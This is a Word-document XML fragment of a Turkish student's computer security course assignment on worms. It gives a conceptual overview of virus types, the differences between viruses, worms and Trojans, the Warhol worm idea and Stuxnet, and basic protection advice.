      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72175AA3" wp14:editId="04FD0BF1">
            <wp:extent cx="5760720" cy="2039620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59" name="Resim 3">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F3ED02-082E-4322-9CFD-2C3D85B81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94F3ED02-082E-4322-9CFD-2C3D85B817E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039620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Bilgisayar ve Bilgi Güvenliği Dersi Ödev Sunumu (İ.Ö)</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Prof. Dr.  Abdulsamet HAŞILOĞLU</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br/>
        <w:t>ADI SOYADI: SELAHATTİN KESKİN</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br/>
        <w:t>NO: 140757040</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br/>
        <w:t>KONU 1 : SOLUCANLAR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Section 2.2.7-2.2.9</w:t>
      </w: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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="270" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Virüsler</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:br/>
        <w:t>Yaygın virüsler genellikle dikkatsiz ya da yetersiz bilgi sahibi bilgisayar kullanıcıları tarafından farkında olmadan gönderilirler. Bu kötü amaçlı yazılımlar çoğunlukla başka bir yazılımın yanında ek olarak, İnternet bağlantılarını (linkler) kullanarak ya da diğer programların kaynak kodlarında kendilerini gizleyerek bilgisayarlara bulaşırlar. Farklı virüs çeşitleri bulaştıkları işletim sistemlerinin farklı bölümlerinde etkinlik gösterebilirler. Virüsler, etkinlik gösterdikleri alanlara göre 4 farklı gruba ayırabilir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Dosya sistemi virüsleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> Farklı dosya sistemleri içerisinde yer alan virüs çeşididir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Önyükleme bölümü (boot sector) virüsleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> İşletim sisteminin önyükleme dosyaları arasına sızarak bilgisayarın açılmasıyla birlikte çalışmaya başlayan virüslerdir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Makro yazılım virüsleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> MS Office gibi makro yazılımların içerisinde gizlenen virüslerdir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Komut dosyası (script host) virüsleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> İnternet sayfalarının kaynak kodu dosyaları içerisinde gizlenen virüslerdir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="270" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Farklı virüsler, bulaştıkları bilgisayarlara farklı oranlarda zarar verebilmektedirler. Bu etki bazen kullanıcıyı fazla rahatsız etmeyecek bir seviyede olurken, bazı virüs çeşitlerinde sistemi tümden çökertecek kadar ciddi hasarlara sebep olabilmektedir.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Solucanlar </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Solucanlar, daha karmaşık yapıya sahip olan zararlı yazılımlardır. Genellikle e-posta ile gönderilen ekler, çeşitli web siteleri ve ağ üzerinde paylaşılan dosyaları kullanarak yayılırlar. Solucanlar, bir sistemi ele geçirdiklerinde, kullanıcının başka bir eylemine ihtiyaç duymadan, kullanıcının veri kaynaklarını kullanarak (e-posta adres listesi gibi) kendi kaynak dosyalarını hızlı bir şekilde diğer kullanıcılara da ulaştırmayı denerler ve bu yolla kendilerini çok fazla sayıda çoğaltabilirler. Solucanlar bunu yaparken kullanıcıların bant genişliklerini ve ağ kaynaklarını kullandıklarından ağların kilitlenmesine, e-posta sunucularının </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>aşırı yüklenmesine veya Web kaynaklarına erişim hızının düşmesine sebep olabilmektedirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="270" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Virüs, Solucan ve Truva Atları Arasındaki Farklar:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Virüsler yayılabilmek için kullanıcının kendisini diğer kullanıcılara bilerek veya bilmeyerek yollamasını beklerler, solucanlar ise böyle bir şeye gerek duymadan bir bilgisayara girdiği anda kendisini çoğaltmaya ve yeni kullanıcıların bilgisayarlarına ulaşmaya çalışırlar.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Solucanlar genellikle ağ kaynaklarını hedef alırken, virüsler daha çok bulaştığı bilgisayarın sistem kaynakları üzerinde etki gösterirler. Truva atlarının hedefi ise sistem üzerinde delikler yaratarak programcısına bu bilgisayara müdahale edebileceği bir ortam yaratmaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Bilgisayar Solucanlarından Kaynaklanan Tehdit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Bilgisayar solucanları, kendilerini kopyalayabildikleri, bağımsız oldukları ve herhangi bir insan etkileşimi olmadan bir bilgisayarın mevcut veri aktarma mekanizmaları üzerinden yayılabildikleri için önemli bir güvenlik sorunudur. Bir Truva atıyla birleştirilen bir bilgisayar solucanı (hibrit kötü amaçlı yazılım), birden çok saldırı türünü gerçekleştirmek ve gelecek saldırılar için kendini gizlemek amacıyla birden çok taşıma yöntemi kullanabilen, Truva atı yükü taşıyan bir solucandır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Gerçek bir Warhol solucanı bu türde hibrit kötü amaçlı yazılımlar oluşturabildiği için önemli bir sorundur. Kötü amaçlı yük taşıyan ve İnternet'teki tüm ana bilgisayarlara 15 dakika içinde yayılan bir solucan, insanlar zararı durdurmak için yanıt veremeden yükün neden olacağı zararın gerçekleşeceği anlamına gelir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Bilgisayarınızın kötü amaçlı yazılımlara karşı güvenliğini sağlamak için bilgisayar işletim sisteminizi güncel tutun, modern bir tarayıcı kullanın ve tüm yazılım programlarınızın güncel </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>olduğundan ve en son güvenlik yamalarının uygulandığından emin olun. Antivirüs ürünlerini ve eksiksiz İnternet güvenliği ürünlerini değerlendirin; tüm tehditlere karşı gerçek zamanlı, kapsamlı koruma sağlayanlar arasından seçim yapın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>İlk Solucan ilk Dijital Silah :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4283">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Stuxnet, dünyadaki ilk dijital silah olma özelliğine sahip eşsiz bir virüs. Belli bir bilgi hırsızlığı yerine, bu virüs bilgisayarlara fiziksel zararlar verdi. Solucanın, İran’daki uranyum tesislerine zarar verdiği biliniyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="270" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B4283" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
